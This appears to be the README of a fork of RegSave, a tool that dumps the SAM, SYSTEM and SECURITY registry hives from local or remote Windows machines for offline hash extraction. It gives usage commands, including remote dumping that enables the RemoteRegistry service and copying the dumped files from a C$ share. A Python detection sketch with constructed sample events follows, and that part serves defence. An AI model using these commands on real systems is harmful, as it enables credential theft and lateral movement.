A fork of RegSave BOF. Dump SAM/SYSTEM/SECURITY registry key hives on a local or remote computer using RegConnectRegistryA and RegOpenKeyExA for offline parsing and hash extraction.
Dump registry key hives on the local computer (admin elevation required):
RegSave --path [file path <optional>]
Dump registry key hives on a remote computer (automatically enables the RemoteRegistry service if it is disabled):
RegSave --pc remotePC --path [file path <optional>]
shell copy \\remoteSrv\C$\Windows\temp\HG029* .
cd SOURCE
make
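
The remote mode above leaves two observable traces on the target: the RemoteRegistry service leaving the disabled state, and files matching the HG029* prefix (taken from the copy command) appearing in C:\Windows\Temp. The following detection sketch is an added example, not part of RegSave or this repository; the normalized event schema, the sample records, the file names and the 5-minute window are constructed assumptions.

```python
import fnmatch
from datetime import datetime, timedelta

# Constructed, already-normalized records (assumed schema, not a real log export).
# 7040 = Service Control Manager "start type changed"; 11 = Sysmon FileCreate.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "host": "SRV01", "event_id": 7040,
     "service": "RemoteRegistry", "old_start": "disabled", "new_start": "demand start"},
    {"time": "2024-05-01T10:00:09", "host": "SRV01", "event_id": 11,
     "target": r"C:\Windows\Temp\HG029aa"},
    {"time": "2024-05-01T10:00:10", "host": "SRV01", "event_id": 11,
     "target": r"C:\Windows\Temp\HG029bb"},
    {"time": "2024-05-01T11:30:00", "host": "SRV02", "event_id": 11,
     "target": r"C:\Windows\Temp\setup.log"},
    {"time": "2024-05-01T12:00:00", "host": "SRV03", "event_id": 7040,
     "service": "RemoteRegistry", "old_start": "disabled", "new_start": "demand start"},
]

DUMP_PATTERN = r"c:\windows\temp\hg029*"  # prefix from the copy command on this page
WINDOW = timedelta(minutes=5)             # assumed correlation window


def find_hive_dump_activity(events, window=WINDOW):
    """Return {host: [files]} for hosts where RemoteRegistry left the disabled
    state and HG029* files appeared in Windows\\Temp within `window` afterwards."""
    enabled_at = {}  # host -> times RemoteRegistry was switched away from disabled
    hits = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        host = ev["host"]
        if (ev["event_id"] == 7040
                and ev.get("service", "").lower() == "remoteregistry"
                and ev.get("old_start", "").lower() == "disabled"):
            enabled_at.setdefault(host, []).append(ts)
        elif ev["event_id"] == 11:
            path = ev.get("target", "").lower()
            # fnmatchcase: plain glob match without OS-specific path normalization
            if fnmatch.fnmatchcase(path, DUMP_PATTERN) and any(
                    timedelta(0) <= ts - t <= window
                    for t in enabled_at.get(host, [])):
                hits.setdefault(host, []).append(ev["target"])
    return hits


if __name__ == "__main__":
    for host, files in find_hive_dump_activity(SAMPLE_EVENTS).items():
        print(f"{host}: RemoteRegistry enabled, then hive-like files written: {files}")
```

A service change with no matching file (SRV03) or an unrelated temp file (SRV02) is not flagged on its own; only the two signals together on one host within the window produce a hit.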